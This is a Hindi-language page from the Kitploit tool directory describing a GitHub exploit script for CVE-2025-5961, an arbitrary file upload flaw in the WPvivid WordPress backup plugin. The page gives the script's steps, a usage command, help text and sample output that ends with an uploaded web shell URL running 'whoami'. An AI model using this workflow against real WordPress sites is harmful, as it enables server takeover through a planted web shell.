Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-5961 — माइग्रेशन, बैकअप, स्टेजिंग – WPvivid Backup & Migration <= 0.9.116 - प्रमाणित (व्यवस्थापक+) मनमाना फ़ाइल अपलोड | Kitploit
उपकरण/GitHubGitHub/nxploited/cve-2025-5961
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubnxploited/cve-2025-5961

CVE-2025-5961

माइग्रेशन, बैकअप, स्टेजिंग – WPvivid Backup & Migration <= 0.9.116 - प्रमाणित (व्यवस्थापक+) मनमाना फ़ाइल अपलोड

रिपॉजिटरी देखें
1 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

🚨 Migration, Backup, Staging – WPvivid Backup & Migration <= 0.9.116 - प्रमाणित (व्यवस्थापक+) मनमाना फ़ाइल अपलोड

📈 यह भेद्यता 700,000+ इंस्टॉल वाले प्लगइन को प्रभावित करती है


📝 CVE विवरण

  • CVE: CVE-2025-5961
  • CVSS: 7.2 (उच्च)
  • प्रकाशित: जुलाई 3, 2025

🔍 विवरण

WordPress के लिए Migration, Backup, Staging – WPvivid Backup & Migration प्लगइन, wpvivid_upload_import_files फ़ंक्शन में फ़ाइल प्रकार सत्यापन की कमी के कारण, 0.9.116 तक (और सहित) सभी संस्करणों में मनमानी फ़ाइल अपलोड के प्रति संवेदनशील है।

यह प्रमाणित हमलावरों (व्यवस्थापक स्तर और ऊपर) को सर्वर पर मनमानी फ़ाइलें अपलोड करने की अनुमति देता है, जिससे संभावित रूप से रिमोट कोड निष्पादन सक्षम हो सकता है।


🧰 स्क्रिप्ट

इस रिपॉजिटरी में CVE-2025-5961 के लिए Python में लिखी गई एक एक्सप्लॉइट स्क्रिप्ट है, जो:

  • प्लगइन संस्करण की जाँच करती है।
  • व्यवस्थापक के रूप में लॉग इन करती है।
  • प्लगइन पेज से आवश्यक nonce निकालती है।
  • वेब शेल पेलोड अपलोड करती है।
  • शेल तक पहुँचने के लिए URL प्रिंट करती है।

🖥️ उदाहरण उपयोग

root@kitploit:~
python3 CVE-2025-5961.py -u http://target/wordpress -un admin -p password123

⚙️ उपयोग

root@kitploit:~
$ python3 CVE-2025-5961.py -h

usage: CVE-2025-5961.py [-h] -u URL -un USERNAME -p PASSWORD

CVE-2025-5961 Exploit by Khaled Alenazi (Nxploited)

options:
  -h, --help            show this help message and exit
  -u, --url URL         Target WordPress URL
  -un, --username USERNAME
                        Admin username
  -p, --password PASSWORD

📊 आउटपुट उदाहरण

root@kitploit:~
[+] Checking plugin version...
[+] Detected plugin version: 0.9.116
[+] Target is vulnerable. Continuing exploit.
[+] Logging in to http://target/wordpress...
[+] Logged in successfully.
[+] Fetching WPvivid page to extract nonce...
[+] Extracted nonce: 502d5dce0e
[+] Uploading shell...
[+] Exploit succeeded!
[+] Shell URL: http://target/wordpress/wp-content/wpvividbackups/ImportandExport/shellnxploited.php?cmd=whoami
Exploit By: Khaled Alenazi (Nxploited) - https://github.com/Nxploited/

⚖️ अस्वीकरण

यह स्क्रिप्ट केवल शैक्षिक और शोध उद्देश्यों के लिए प्रदान की गई है।
लेखक इस उपकरण से होने वाले किसी भी दुरुपयोग या क्षति के लिए ज़िम्मेदार नहीं है।


✍️ द्वारा

Khaled Alenazi (Nxploited)
🌐 GitHub


टूल डाउनलोड करें